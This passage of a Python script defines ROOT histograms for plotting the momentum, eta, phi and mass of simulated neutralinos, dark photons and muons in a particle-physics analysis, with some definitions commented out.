h_n1_1_Phi_dummy.SetYTitle("Fraction of events / 0.1 rad")
h_n1_1_Phi_dummy.SetTitleOffset(1.35, "Y")
h_n1_1_Phi_dummy.SetXTitle("#phi of n_{1} [rad]")
h_n1_1_Phi_dummy.SetMaximum( 0.05 )
h_n1_1_p_dummy = ROOT.TH1F("h_n1_1_p_dummy", "h_n1_1_p_dummy", 300, 0, 300)
h_n1_1_p_dummy.SetYTitle("Fraction of events / 1 GeV")
h_n1_1_p_dummy.SetTitleOffset(1.35, "Y")
h_n1_1_p_dummy.SetXTitle("p of n_{1} [GeV]")
h_n1_1_p_dummy.SetMaximum( 0.1 )
h_n1_1_M_dummy = ROOT.TH1F("h_n1_1_M_dummy", "h_n1_1_M_dummy", 200, 0.05, 20.05)
h_n1_1_M_dummy.SetYTitle("Fraction of events / 0.1 GeV")
h_n1_1_M_dummy.SetTitleOffset(1.35, "Y")
h_n1_1_M_dummy.SetXTitle("Mass of n_{1} [GeV]")
h_n1_1_M_dummy.SetMaximum( 1.6 )
h_n1_1_p = ROOT.TH1F("h_n1_1_p", "h_n1_1_p", 300, 0, 300)
h_n1_1_p.SetLineColor(ROOT.kBlue)
h_n1_1_p.SetLineWidth(2)
h_n1_1_p.SetLineStyle(1)
h_n1_1_M = ROOT.TH1F("h_n1_1_M", "h_n1_1_M", 200, 0.05, 20.05)
h_n1_1_M.SetLineColor(ROOT.kBlue)
h_n1_1_M.SetLineWidth(2)
h_n1_1_M.SetLineStyle(1)
h_n1_1_pT = ROOT.TH1F("h_n1_1_pT", "h_n1_1_pT", 70, 0, 70) #this is the peak at 60
h_n1_1_pT.SetLineColor(ROOT.kBlue)
h_n1_1_pT.SetLineWidth(2)
h_n1_1_pT.SetLineStyle(1)
h_n1_1_pZ = ROOT.TH1F("h_n1_1_pZ", "h_n1_1_pZ", 300, 0, 300)
h_n1_1_pZ.SetLineColor(ROOT.kBlue)
h_n1_1_pZ.SetLineWidth(2)
h_n1_1_pZ.SetLineStyle(1)
h_n1_1_Eta = ROOT.TH1F("h_n1_1_Eta", "h_n1_1_Eta", 100,-5,5)
h_n1_1_Eta.SetLineColor(ROOT.kBlue)
h_n1_1_Eta.SetLineWidth(2)
h_n1_1_Eta.SetLineStyle(1)
h_n1_1_Phi = ROOT.TH1F("h_n1_1_Phi", "h_n1_1_Phi", 80,-4,4)
h_n1_1_Phi.SetLineColor(ROOT.kBlue)
h_n1_1_Phi.SetLineWidth(2)
h_n1_1_Phi.SetLineStyle(1)
#h_n1_2_pT_dummy = ROOT.TH1F("h_n1_2_pT_dummy", "h_n1_2_pT_dummy", 700, 0, 70) #this is the peak at ~10GeV
#h_n1_2_pT_dummy.SetYTitle("Fraction of events / 1 GeV")
#h_n1_2_pT_dummy.SetTitleOffset(1.35, "Y")
#h_n1_2_pT_dummy.SetXTitle("p_{T n_{1}} [GeV]")
#h_n1_2_pT_dummy.SetMaximum( yMax )
#
#h_n1_2_p_dummy = ROOT.TH1F("h_n1_2_p_dummy", "h_n1_2_p_dummy", 20, 50, 70)
#h_n1_2_p_dummy.SetYTitle("Fraction of events / 1 GeV")
#h_n1_2_p_dummy.SetTitleOffset(1.35, "Y")
#h_n1_2_p_dummy.SetXTitle("p_{n_{1}} [GeV]")
#h_n1_2_p_dummy.SetMaximum( 0.05 )
#
#h_n1_2_M_dummy = ROOT.TH1F("h_n1_2_M_dummy", "h_n1_2_M_dummy", 200, 0, 20)
#h_n1_2_M_dummy.SetYTitle("Fraction of events / 1 GeV")
#h_n1_2_M_dummy.SetTitleOffset(1.35, "Y")
#h_n1_2_M_dummy.SetXTitle("m_{n_{1}} [GeV]")
#h_n1_2_M_dummy.SetMaximum( 1.2 )
h_n1_2_p = ROOT.TH1F("h_n1_2_p", "h_n1_2_p", 300, 0, 300)
h_n1_2_p.SetLineColor(ROOT.kRed)
h_n1_2_p.SetLineWidth(2)
h_n1_2_p.SetLineStyle(1)
#h_n1_2_M = ROOT.TH1F("h_n1_2_M", "h_n1_2_M", 200, 0.05, 20.05)
#h_n1_2_M.SetLineColor(ROOT.kRed)
#h_n1_2_M.SetLineWidth(2)
#h_n1_2_M.SetLineStyle(1)
h_n1_2_pT = ROOT.TH1F("h_n1_2_pT", "h_n1_2_pT", 70, 0, 70)
h_n1_2_pT.SetLineColor(ROOT.kRed)
h_n1_2_pT.SetLineWidth(2)
h_n1_2_pT.SetLineStyle(1)
h_nD_1_pT_dummy = ROOT.TH1F("h_nD_1_pT_dummy", "h_nD_1_pT_dummy", 130, 0, 130)
h_nD_1_pT_dummy.SetYTitle("Fraction of events / 1 GeV")
h_nD_1_pT_dummy.SetTitleOffset(1.35, "Y")
h_nD_1_pT_dummy.SetXTitle("p_{T} of n_{D} [GeV]")
h_nD_1_pT_dummy.SetMaximum( 0.1 )
h_n1_2_pZ = ROOT.TH1F("h_n1_2_pZ", "h_n1_2_pZ", 300, 0, 300)
h_n1_2_pZ.SetLineColor(ROOT.kRed)
h_n1_2_pZ.SetLineWidth(2)
h_n1_2_pZ.SetLineStyle(1)
h_nD_1_pZ_dummy = ROOT.TH1F("h_nD_1_pZ_dummy", "h_nD_1_pZ_dummy", 130, 0, 130)
h_nD_1_pZ_dummy.SetYTitle("Fraction of events / 1 GeV")
h_nD_1_pZ_dummy.SetTitleOffset(1.35, "Y")
h_nD_1_pZ_dummy.SetXTitle("|p_{Z}| of n_{D} [GeV]")
h_nD_1_pZ_dummy.SetMaximum( 0.1 )
h_n1_2_Eta = ROOT.TH1F("h_n1_2_Eta", "h_n1_2_Eta", 100,-5,5)
h_n1_2_Eta.SetLineColor(ROOT.kRed)
h_n1_2_Eta.SetLineWidth(2)
h_n1_2_Eta.SetLineStyle(1)
h_nD_1_Eta_dummy = ROOT.TH1F("h_nD_1_Eta_dummy", "h_nD_1_Eta_dummy", 100,-5,5)
h_nD_1_Eta_dummy.SetYTitle("Fraction of events / 0.1")
h_nD_1_Eta_dummy.SetTitleOffset(1.35, "Y")
h_nD_1_Eta_dummy.SetXTitle("#eta of n_{D}")
h_nD_1_Eta_dummy.SetMaximum( 0.1 )
h_n1_2_Phi = ROOT.TH1F("h_n1_2_Phi", "h_n1_2_Phi", 80,-4,4)
h_n1_2_Phi.SetLineColor(ROOT.kRed)
h_n1_2_Phi.SetLineWidth(2)
h_n1_2_Phi.SetLineStyle(1)
h_nD_1_Phi_dummy = ROOT.TH1F("h_nD_1_Phi_dummy", "h_nD_1_Phi_dummy", 80,-4,4)
h_nD_1_Phi_dummy.SetYTitle("Fraction of events / 0.1 rad")
h_nD_1_Phi_dummy.SetTitleOffset(1.35, "Y")
h_nD_1_Phi_dummy.SetXTitle("#phi of n_{D} [rad]")
h_nD_1_Phi_dummy.SetMaximum( 0.05 )
h_nD_1_p_dummy = ROOT.TH1F("h_nD_1_p_dummy", "h_nD_1_p_dummy", 130, 0, 130)
h_nD_1_p_dummy.SetYTitle("Fraction of events / 1 GeV")
h_nD_1_p_dummy.SetTitleOffset(1.35, "Y")
h_nD_1_p_dummy.SetXTitle("p of n_{D} [GeV]")
h_nD_1_p_dummy.SetMaximum( 0.1 )
h_nD_1_M_dummy = ROOT.TH1F("h_nD_1_M_dummy", "h_nD_1_M_dummy", 20, 0.05, 2.05)
h_nD_1_M_dummy.SetYTitle("Fraction of events / 0.1 GeV")
h_nD_1_M_dummy.SetTitleOffset(1.35, "Y")
h_nD_1_M_dummy.SetXTitle("Mass of n_{D} [GeV]")
h_nD_1_M_dummy.SetMaximum( 1.6 )
h_nD_1_p = ROOT.TH1F("h_nD_1_p", "h_nD_1_p", 130, 0, 130)
h_nD_1_p.SetLineColor(ROOT.kBlue)
h_nD_1_p.SetLineWidth(2)
h_nD_1_p.SetLineStyle(1)
h_nD_1_M = ROOT.TH1F("h_nD_1_M", "h_nD_1_M", 20, 0.05, 2.05)
h_nD_1_M.SetLineColor(ROOT.kBlue)
h_nD_1_M.SetLineWidth(2)
h_nD_1_M.SetLineStyle(1)
h_nD_1_pT = ROOT.TH1F("h_nD_1_pT", "h_nD_1_pT", 130, 0, 130)
h_nD_1_pT.SetLineColor(ROOT.kBlue)
h_nD_1_pT.SetLineWidth(2)
h_nD_1_pT.SetLineStyle(1)
h_nD_1_pZ = ROOT.TH1F("h_nD_1_pZ", "h_nD_1_pZ", 130, 0, 130)
h_nD_1_pZ.SetLineColor(ROOT.kBlue)
h_nD_1_pZ.SetLineWidth(2)
h_nD_1_pZ.SetLineStyle(1)
h_nD_1_Eta = ROOT.TH1F("h_nD_1_Eta", "h_nD_1_Eta", 100,-5,5)
h_nD_1_Eta.SetLineColor(ROOT.kBlue)
h_nD_1_Eta.SetLineWidth(2)
h_nD_1_Eta.SetLineStyle(1)
h_nD_1_Phi = ROOT.TH1F("h_nD_1_Phi", "h_nD_1_Phi", 80,-4,4)
h_nD_1_Phi.SetLineColor(ROOT.kBlue)
h_nD_1_Phi.SetLineWidth(2)
h_nD_1_Phi.SetLineStyle(1)
#h_nD_2_pT_dummy = ROOT.TH1F("h_nD_2_pT_dummy", "h_nD_2_pT_dummy", 100, 0, 100)
#h_nD_2_pT_dummy.SetYTitle("Fraction of events / 1 GeV")
#h_nD_2_pT_dummy.SetTitleOffset(1.35, "Y")
#h_nD_2_pT_dummy.SetXTitle("p_{T nD_2} [GeV]")
#h_nD_2_pT_dummy.SetMaximum( 0.01 )
#
#h_nD_2_p_dummy = ROOT.TH1F("h_nD_2_p_dummy", "h_nD_2_p_dummy", 100, 0, 100)
#h_nD_2_p_dummy.SetYTitle("Fraction of events / 1 GeV")
#h_nD_2_p_dummy.SetTitleOffset(1.35, "Y")
#h_nD_2_p_dummy.SetXTitle("p_{nD_2} [GeV]")
#h_nD_2_p_dummy.SetMaximum( 0.01 )
#
#h_nD_2_M_dummy = ROOT.TH1F("h_nD_2_M_dummy", "h_nD_2_M_dummy", 20, 0, 2)
#h_nD_2_M_dummy.SetYTitle("Fraction of events / 1 GeV")
#h_nD_2_M_dummy.SetTitleOffset(1.35, "Y")
#h_nD_2_M_dummy.SetXTitle("m_{nD_2} [GeV]")
#h_nD_2_M_dummy.SetMaximum( 1.2 )
h_nD_2_p = ROOT.TH1F("h_nD_2_p", "h_nD_2_p", 130, 0, 130)
h_nD_2_p.SetLineColor(ROOT.kRed)
h_nD_2_p.SetLineWidth(2)
h_nD_2_p.SetLineStyle(1)
#h_nD_2_M = ROOT.TH1F("h_nD_2_M", "h_nD_2_M", 20, 0.05, 2.05)
#h_nD_2_M.SetLineColor(ROOT.kRed)
#h_nD_2_M.SetLineWidth(2)
#h_nD_2_M.SetLineStyle(1)
h_nD_2_pT = ROOT.TH1F("h_nD_2_pT", "h_nD_2_pT", 130, 0, 130)
h_nD_2_pT.SetLineColor(ROOT.kRed)
h_nD_2_pT.SetLineWidth(2)
h_nD_2_pT.SetLineStyle(1)
h_gammaD_1_pT_dummy = ROOT.TH1F("h_gammaD_1_pT_dummy", "h_gammaD_1_pT_dummy", 100, 0, 100)
h_gammaD_1_pT_dummy.SetYTitle("Fraction of events / 1 GeV")
h_gammaD_1_pT_dummy.SetTitleOffset(1.35, "Y")
h_gammaD_1_pT_dummy.SetXTitle("p_{T} of #gamma_{D} [GeV]")
h_gammaD_1_pT_dummy.SetMaximum( 0.1 )
h_nD_2_pZ = ROOT.TH1F("h_nD_2_pZ", "h_nD_2_pZ", 130, 0, 130)
h_nD_2_pZ.SetLineColor(ROOT.kRed)
h_nD_2_pZ.SetLineWidth(2)
h_nD_2_pZ.SetLineStyle(1)
h_gammaD_1_pZ_dummy = ROOT.TH1F("h_gammaD_1_pZ_dummy", "h_gammaD_1_pZ_dummy", 100, 0, 100)
h_gammaD_1_pZ_dummy.SetYTitle("Fraction of events / 1 GeV")
h_gammaD_1_pZ_dummy.SetTitleOffset(1.35, "Y")
h_gammaD_1_pZ_dummy.SetXTitle("|p_{Z}| of #gamma_{D} [GeV]")
h_gammaD_1_pZ_dummy.SetMaximum( 0.1 )
h_nD_2_Eta = ROOT.TH1F("h_nD_2_Eta", "h_nD_2_Eta", 100,-5,5)
h_nD_2_Eta.SetLineColor(ROOT.kRed)
h_nD_2_Eta.SetLineWidth(2)
h_nD_2_Eta.SetLineStyle(1)
h_gammaD_1_Eta_dummy = ROOT.TH1F("h_gammaD_1_Eta_dummy", "h_gammaD_1_Eta_dummy",100,-5,5)
h_gammaD_1_Eta_dummy.SetYTitle("Fraction of events / 0.1")
h_gammaD_1_Eta_dummy.SetTitleOffset(1.35, "Y")
h_gammaD_1_Eta_dummy.SetXTitle("#eta of #gamma_{D}")
h_gammaD_1_Eta_dummy.SetMaximum( 0.1 )
h_nD_2_Phi = ROOT.TH1F("h_nD_2_Phi", "h_nD_2_Phi", 80,-4,4)
h_nD_2_Phi.SetLineColor(ROOT.kRed)
h_nD_2_Phi.SetLineWidth(2)
h_nD_2_Phi.SetLineStyle(1)
h_gammaD_1_Phi_dummy = ROOT.TH1F("h_gammaD_1_Phi_dummy", "h_gammaD_1_Phi_dummy",80,-4,4 )
h_gammaD_1_Phi_dummy.SetYTitle("Fraction of events / 0.1 rad")
h_gammaD_1_Phi_dummy.SetTitleOffset(1.35, "Y")
h_gammaD_1_Phi_dummy.SetXTitle("#phi of #gamma_{D} [rad]")
h_gammaD_1_Phi_dummy.SetMaximum( 0.05 )
h_gammaD_1_p_dummy = ROOT.TH1F("h_gammaD_1_p_dummy", "h_gammaD_1_p_dummy", 100, 0, 100)
h_gammaD_1_p_dummy.SetYTitle("Fraction of events / 1 GeV")
h_gammaD_1_p_dummy.SetTitleOffset(1.35, "Y")
h_gammaD_1_p_dummy.SetXTitle("p of #gamma_{D} [GeV]")
h_gammaD_1_p_dummy.SetMaximum( 0.1 )
h_gammaD_1_M_dummy = ROOT.TH1F("h_gammaD_1_M_dummy", "h_gammaD_1_M_dummy", 101, 0.1, 10.1)
h_gammaD_1_M_dummy.SetYTitle("Fraction of events / 0.1 GeV")
h_gammaD_1_M_dummy.SetTitleOffset(1.35, "Y")
h_gammaD_1_M_dummy.SetXTitle("Mass of #gamma_{D} [GeV]")
h_gammaD_1_M_dummy.SetMaximum( 1.4 )
h_gammaD_1_p = ROOT.TH1F("h_gammaD_1_p", "h_gammaD_1_p", 100, 0, 100)
h_gammaD_1_p.SetLineColor(ROOT.kBlue)
h_gammaD_1_p.SetLineWidth(2)
h_gammaD_1_p.SetLineStyle(1)
h_gammaD_1_M = ROOT.TH1F("h_gammaD_1_M", "h_gammaD_1_M", 101, 0.1, 10.1)
h_gammaD_1_M.SetLineColor(ROOT.kBlue)
h_gammaD_1_M.SetLineWidth(2)
h_gammaD_1_M.SetLineStyle(1)
h_gammaD_1_pT = ROOT.TH1F("h_gammaD_1_pT", "h_gammaD_1_pT", 100, 0, 100)
h_gammaD_1_pT.SetLineColor(ROOT.kBlue)
h_gammaD_1_pT.SetLineWidth(2)
h_gammaD_1_pT.SetLineStyle(1)
h_gammaD_1_pZ = ROOT.TH1F("h_gammaD_1_pZ", "h_gammaD_1_pZ", 100, 0, 100)
h_gammaD_1_pZ.SetLineColor(ROOT.kBlue)
h_gammaD_1_pZ.SetLineWidth(2)
h_gammaD_1_pZ.SetLineStyle(1)
h_gammaD_1_Eta = ROOT.TH1F("h_gammaD_1_Eta", "h_gammaD_1_Eta",100,-5,5)
h_gammaD_1_Eta.SetLineColor(ROOT.kBlue)
h_gammaD_1_Eta.SetLineWidth(2)
h_gammaD_1_Eta.SetLineStyle(1)
h_gammaD_1_Phi = ROOT.TH1F("h_gammaD_1_Phi", "h_gammaD_1_Phi", 80,-4,4)
h_gammaD_1_Phi.SetLineColor(ROOT.kBlue)
h_gammaD_1_Phi.SetLineWidth(2)
h_gammaD_1_Phi.SetLineStyle(1)
#h_gammaD_2_pT_dummy = ROOT.TH1F("h_gammaD_2_pT_dummy", "h_gammaD_2_pT_dummy", 100, 0, 100)
#h_gammaD_2_pT_dummy.SetYTitle("Fraction of events / 1 GeV")
#h_gammaD_2_pT_dummy.SetTitleOffset(1.35, "Y")
#h_gammaD_2_pT_dummy.SetXTitle("p_{T gammaD_2} [GeV]")
#h_gammaD_2_pT_dummy.SetMaximum( 0.01 )
#
#h_gammaD_2_p_dummy = ROOT.TH1F("h_gammaD_2_p_dummy", "h_gammaD_2_p_dummy", 100, 0, 100)
#h_gammaD_2_p_dummy.SetYTitle("Fraction of events / 1 GeV")
#h_gammaD_2_p_dummy.SetTitleOffset(1.35, "Y")
#h_gammaD_2_p_dummy.SetXTitle("p_{gammaD_2} [GeV]")
#h_gammaD_2_p_dummy.SetMaximum( 0.01 )
#
#h_gammaD_2_M_dummy = ROOT.TH1F("h_gammaD_2_M_dummy", "h_gammaD_2_M_dummy", 300, 0, 3)
#h_gammaD_2_M_dummy.SetYTitle("Fraction of events / 1 GeV")
#h_gammaD_2_M_dummy.SetTitleOffset(1.35, "Y")
#h_gammaD_2_M_dummy.SetXTitle("m_{gammaD_2} [GeV]")
#h_gammaD_2_M_dummy.SetMaximum( 1.2 )
h_gammaD_2_p = ROOT.TH1F("h_gammaD_2_p", "h_gammaD_2_p", 100, 0, 100)
h_gammaD_2_p.SetLineColor(ROOT.kRed)
h_gammaD_2_p.SetLineWidth(2)
h_gammaD_2_p.SetLineStyle(1)
#h_gammaD_2_M = ROOT.TH1F("h_gammaD_2_M", "h_gammaD_2_M", 500, 0.005, 10.005)
#h_gammaD_2_M.SetLineColor(ROOT.kRed)
#h_gammaD_2_M.SetLineWidth(2)
#h_gammaD_2_M.SetLineStyle(1)
h_gammaD_2_pT = ROOT.TH1F("h_gammaD_2_pT", "h_gammaD_2_pT", 100, 0, 100)
h_gammaD_2_pT.SetLineColor(ROOT.kRed)
h_gammaD_2_pT.SetLineWidth(2)
h_gammaD_2_pT.SetLineStyle(1)
h_gammaD_2_pZ = ROOT.TH1F("h_gammaD_2_pZ", "h_gammaD_2_pZ", 100, 0, 100)
h_gammaD_2_pZ.SetLineColor(ROOT.kRed)
h_gammaD_2_pZ.SetLineWidth(2)
h_gammaD_2_pZ.SetLineStyle(1)
h_gammaD_2_Eta = ROOT.TH1F("h_gammaD_2_Eta", "h_gammaD_2_Eta", 100,-5,5)
h_gammaD_2_Eta.SetLineColor(ROOT.kRed)
h_gammaD_2_Eta.SetLineWidth(2)
h_gammaD_2_Eta.SetLineStyle(1)
h_gammaD_2_Phi = ROOT.TH1F("h_gammaD_2_Phi", "h_gammaD_2_Phi", 80,-4,4)
h_gammaD_2_Phi.SetLineColor(ROOT.kRed)
h_gammaD_2_Phi.SetLineWidth(2)
h_gammaD_2_Phi.SetLineStyle(1)
h_muon_pT_0 = ROOT.TH1F("h_muon_pT_0", "h_muon_pT_0", nBins, binMin, binMax)
h_muon_pT_0.SetLineColor(ROOT.kBlue)
h_muon_pT_0.SetLineWidth(2)
h_muon_pT_0.SetLineStyle(1)
h_muon_pT_1 = ROOT.TH1F("h_muon_pT_1", "h_muon_pT_1", nBins, binMin, binMax)
h_muon_pT_1.SetLineColor(ROOT.kGreen)
h_muon_pT_1.SetLineWidth(2)
h_muon_pT_1.SetLineStyle(2)
h_muon_pT_2 = ROOT.TH1F("h_muon_pT_2", "h_muon_pT_2", nBins, binMin, binMax)
h_muon_pT_2.SetLineColor(ROOT.kRed)
h_muon_pT_2.SetLineWidth(2)
h_muon_pT_2.SetLineStyle(3)
h_muon_pT_3 = ROOT.TH1F("h_muon_pT_3", "h_muon_pT_3", nBins, binMin, binMax)
h_muon_pT_3.SetLineColor(ROOT.kBlack)
h_muon_pT_3.SetLineWidth(2)
h_muon_pT_3.SetLineStyle(4)
h_muon_phi_dummy = ROOT.TH1F("h_muon_phi_dummy", "h_muon_phi_dummy", 80, -4, 4)
h_muon_phi_dummy.SetYTitle("Fraction of events / 0.1 rad")
h_muon_phi_dummy.SetTitleOffset(1.35, "Y")
h_muon_phi_dummy.SetXTitle("#phi of #mu [rad]")
h_muon_phi_dummy.SetMaximum( 0.1 )
h_muon_phi_0 = ROOT.TH1F("h_muon_phi_0", "h_muon_phi_0", 80, -4, 4)
h_muon_phi_0.SetLineColor(ROOT.kBlue)
h_muon_phi_0.SetLineWidth(2)
h_muon_phi_0.SetLineStyle(1)
h_muon_phi_1 = ROOT.TH1F("h_muon_phi_1", "h_muon_phi_1", 80, -4, 4)
h_muon_phi_1.SetLineColor(ROOT.kGreen)
h_muon_phi_1.SetLineWidth(2)
h_muon_phi_1.SetLineStyle(2)
h_muon_phi_2 = ROOT.TH1F("h_muon_phi_2", "h_muon_phi_2", 80, -4, 4)
h_muon_phi_2.SetLineColor(ROOT.kRed)
h_muon_phi_2.SetLineWidth(2)
h_muon_phi_2.SetLineStyle(3)
h_muon_phi_3 = ROOT.TH1F("h_muon_phi_3", "h_muon_phi_3", 80, -4, 4)
h_muon_phi_3.SetLineColor(ROOT.kBlack)
h_muon_phi_3.SetLineWidth(2)
h_muon_phi_3.SetLineStyle(4)
h_muon_p_dummy = ROOT.TH1F("h_muon_p_dummy", "h_muon_p_dummy", 125, 0, 125)
h_muon_p_dummy.SetYTitle("Fraction of events / 1 GeV")
h_muon_p_dummy.SetTitleOffset(1.35, "Y")
h_muon_p_dummy.SetXTitle("p of #mu [GeV]")
h_muon_p_dummy.SetMaximum( 0.2 )
h_muon_p_0 = ROOT.TH1F("h_muon_p_0", "h_muon_p_0", 125, 0, 125)
h_muon_p_0.SetLineColor(ROOT.kBlue)
h_muon_p_0.SetLineWidth(2)
h_muon_p_0.SetLineStyle(1)
h_muon_p_1 = ROOT.TH1F("h_muon_p_1", "h_muon_p_1", 125, 0, 125)
h_muon_p_1.SetLineColor(ROOT.kGreen)
h_muon_p_1.SetLineWidth(2)
h_muon_p_1.SetLineStyle(2)
h_muon_p_2 = ROOT.TH1F("h_muon_p_2", "h_muon_p_2", 125, 0, 125)
h_muon_p_2.SetLineColor(ROOT.kRed)
h_muon_p_2.SetLineWidth(2)
h_muon_p_2.SetLineStyle(3)
h_muon_p_3 = ROOT.TH1F("h_muon_p_3", "h_muon_p_3", 125, 0, 125)
h_muon_p_3.SetLineColor(ROOT.kBlack)
h_muon_p_3.SetLineWidth(2)
h_muon_p_3.SetLineStyle(4) # was 125; valid ROOT line styles are 1-10, and the sibling hists use 1-4
h_muon_pZ_0 = ROOT.TH1F("h_muon_pZ_0", "h_muon_pZ_0", 125, 0, 125)
h_muon_pZ_0.SetLineColor(ROOT.kBlue)
h_muon_pZ_0.SetLineWidth(2)
h_muon_pZ_0.SetLineStyle(1)
h_muon_pZ_1 = ROOT.TH1F("h_muon_pZ_1", "h_muon_pZ_1", 125, 0, 125)
h_muon_pZ_1.SetLineColor(ROOT.kGreen)
h_muon_pZ_1.SetLineWidth(2)
h_muon_pZ_1.SetLineStyle(2)
h_muon_pZ_2 = ROOT.TH1F("h_muon_pZ_2", "h_muon_pZ_2", 125, 0, 125)
h_muon_pZ_2.SetLineColor(ROOT.kRed)
h_muon_pZ_2.SetLineWidth(2)
h_muon_pZ_2.SetLineStyle(3)
h_muon_pZ_3 = ROOT.TH1F("h_muon_pZ_3", "h_muon_pZ_3", 125, 0, 125)
h_muon_pZ_3.SetLineColor(ROOT.kBlack)
h_muon_pZ_3.SetLineWidth(2)
h_muon_pZ_3.SetLineStyle(4) # was 125; siblings use styles 1-4
################################################################################
# eta of muons
################################################################################
nBins = 60
binMin = -3.0
binMax = 3.0
yMax = 0.045
h_muon_eta_dummy = ROOT.TH1F("h_muon_eta_dummy", "h_muon_eta_dummy", 100, -5, 5)
h_muon_eta_dummy.SetYTitle("Fraction of events / 0.1")
h_muon_eta_dummy.GetYaxis().SetNdivisions(508);
h_muon_eta_dummy.SetTitleOffset(1.35, "Y")
h_muon_eta_dummy.SetXTitle("#eta of #mu")
h_muon_eta_dummy.SetMaximum( yMax )
h_muon_eta_0 = ROOT.TH1F("h_muon_eta_0", "h_muon_eta_0", 100,-5,5)
h_muon_eta_0.SetLineColor(ROOT.kBlue)
h_muon_eta_0.SetLineWidth(2)
h_muon_eta_0.SetLineStyle(1)
h_muon_eta_1 = ROOT.TH1F("h_muon_eta_1", "h_muon_eta_1", 100,-5,5)
h_muon_eta_1.SetLineColor(ROOT.kGreen)
h_muon_eta_1.SetLineWidth(2)
h_muon_eta_1.SetLineStyle(2)
h_muon_eta_2 = ROOT.TH1F("h_muon_eta_2", "h_muon_eta_2", 100,-5,5)
h_muon_eta_2.SetLineColor(ROOT.kRed)
h_muon_eta_2.SetLineWidth(2)
h_muon_eta_2.SetLineStyle(3)
h_muon_eta_3 = ROOT.TH1F("h_muon_eta_3", "h_muon_eta_3", 100,-5,5)
h_muon_eta_3.SetLineColor(ROOT.kBlack)
h_muon_eta_3.SetLineWidth(2)
h_muon_eta_3.SetLineStyle(4)
################################################################################
# mass of dimuons
################################################################################
nBins = 125
binMin = 0.0
binMax = 125.0
yMax = 0.4
#h_dimuon_m_dummy = ROOT.TH1F("h_dimuon_m_dummy", "h_dimuon_m_dummy", nBins, binMin, binMax)
#h_dimuon_m_dummy.SetYTitle("Fraction of events / 1 GeV")
#h_dimuon_m_dummy.GetYaxis().SetNdivisions(508);
#h_dimuon_m_dummy.SetTitleOffset(1.35, "Y")
#h_dimuon_m_dummy.SetXTitle("m_{#mu#mu} [GeV]")
#h_dimuon_m_dummy.SetMaximum( 1.2 )
#
#h_dimuon_m_0 = ROOT.TH1F("h_dimuon_m_0", "h_dimuon_m_0", nBins, binMin, binMax)
#h_dimuon_m_0.SetLineColor(ROOT.kBlue)
#h_dimuon_m_0.SetLineWidth(2)
#h_dimuon_m_0.SetLineStyle(1)
#
#h_dimuon_m_1 = ROOT.TH1F("h_dimuon_m_1", "h_dimuon_m_1", nBins, binMin, binMax)
#h_dimuon_m_1.SetLineColor(ROOT.kGreen)
#h_dimuon_m_1.SetLineWidth(2)
#h_dimuon_m_1.SetLineStyle(2)
#
#h_dimuon_m_2 = ROOT.TH1F("h_dimuon_m_2", "h_dimuon_m_2", nBins, binMin, binMax)
#h_dimuon_m_2.SetLineColor(ROOT.kRed)
#h_dimuon_m_2.SetLineWidth(2)
#h_dimuon_m_2.SetLineStyle(3)
#
#h_dimuon_m_3 = ROOT.TH1F("h_dimuon_m_3", "h_dimuon_m_3", nBins, binMin, binMax)
#h_dimuon_m_3.SetLineColor(ROOT.kBlack)
#h_dimuon_m_3.SetLineWidth(2)
#h_dimuon_m_3.SetLineStyle(4)
#
#h_dimuon_m_log_dummy = ROOT.TH1F("h_dimuon_m_log_dummy", "h_dimuon_m_log_dummy", nBins, binMin, binMax)
#h_dimuon_m_log_dummy.SetYTitle("Fraction of events / 1 GeV")
#h_dimuon_m_log_dummy.GetYaxis().SetNdivisions(508);
#h_dimuon_m_log_dummy.SetTitleOffset(1.35, "Y")
#h_dimuon_m_log_dummy.SetXTitle("m_{#mu#mu} [GeV]")
#h_dimuon_m_log_dummy.SetMaximum( 1.2 )
#
#h_dimuon_m_log_0 = ROOT.TH1F("h_dimuon_m_log_0", "h_dimuon_m_log_0", nBins, binMin, binMax)
#h_dimuon_m_log_0.SetLineColor(ROOT.kBlue)
#h_dimuon_m_log_0.SetLineWidth(2)
#h_dimuon_m_log_0.SetLineStyle(1)
#
#h_dimuon_m_log_1 = ROOT.TH1F("h_dimuon_m_log_1", "h_dimuon_m_log_1", nBins, binMin, binMax)
#h_dimuon_m_log_1.SetLineColor(ROOT.kGreen)
#h_dimuon_m_log_1.SetLineWidth(2)
#h_dimuon_m_log_1.SetLineStyle(2)
#
#h_dimuon_m_log_2 = ROOT.TH1F("h_dimuon_m_log_2", "h_dimuon_m_log_2", nBins, binMin, binMax)
#h_dimuon_m_log_2.SetLineColor(ROOT.kRed)
#h_dimuon_m_log_2.SetLineWidth(2)
#h_dimuon_m_log_2.SetLineStyle(3)
#
#h_dimuon_m_log_3 = ROOT.TH1F("h_dimuon_m_log_3", "h_dimuon_m_log_3", nBins, binMin, binMax)
#h_dimuon_m_log_3.SetLineColor(ROOT.kBlack)
#h_dimuon_m_log_3.SetLineWidth(2)
#h_dimuon_m_log_3.SetLineStyle(4)
#
#h_dimuon_m_real_fake_dummy = ROOT.TH1F("h_dimuon_m_real_fake_dummy", "h_dimuon_m_real_fake_dummy", nBins, binMin, binMax)
#h_dimuon_m_real_fake_dummy.SetYTitle("Fraction of events / 1 GeV")
#h_dimuon_m_real_fake_dummy.GetYaxis().SetNdivisions(508);
#h_dimuon_m_real_fake_dummy.SetTitleOffset(1.35, "Y")
#h_dimuon_m_real_fake_dummy.SetXTitle("m_{#mu#mu} [GeV]")
#h_dimuon_m_real_fake_dummy.SetMaximum( 1.2 )
#
#h_dimuon_m_real_fake_0 = ROOT.TH1F("h_dimuon_m_real_fake_0", "h_dimuon_m_real_fake_0", nBins, binMin, binMax)
#h_dimuon_m_real_fake_0.SetLineColor(ROOT.kRed)
#h_dimuon_m_real_fake_0.SetLineWidth(2)
#h_dimuon_m_real_fake_0.SetLineStyle(1)
#
#h_dimuon_m_real_fake_1 = ROOT.TH1F("h_dimuon_m_real_fake_1", "h_dimuon_m_real_fake_1", nBins, binMin, binMax)
#h_dimuon_m_real_fake_1.SetLineColor(ROOT.kBlue)
#h_dimuon_m_real_fake_1.SetLineWidth(2)
#h_dimuon_m_real_fake_1.SetLineStyle(2)
#
#h_dimuon_m_real_fake_log_dummy = ROOT.TH1F("h_dimuon_m_real_fake_log_dummy", "h_dimuon_m_real_fake_log_dummy", nBins, binMin, binMax)
#h_dimuon_m_real_fake_log_dummy.SetYTitle("Fraction of events / 1 GeV")
#h_dimuon_m_real_fake_log_dummy.GetYaxis().SetNdivisions(508);
#h_dimuon_m_real_fake_log_dummy.SetTitleOffset(1.35, "Y")
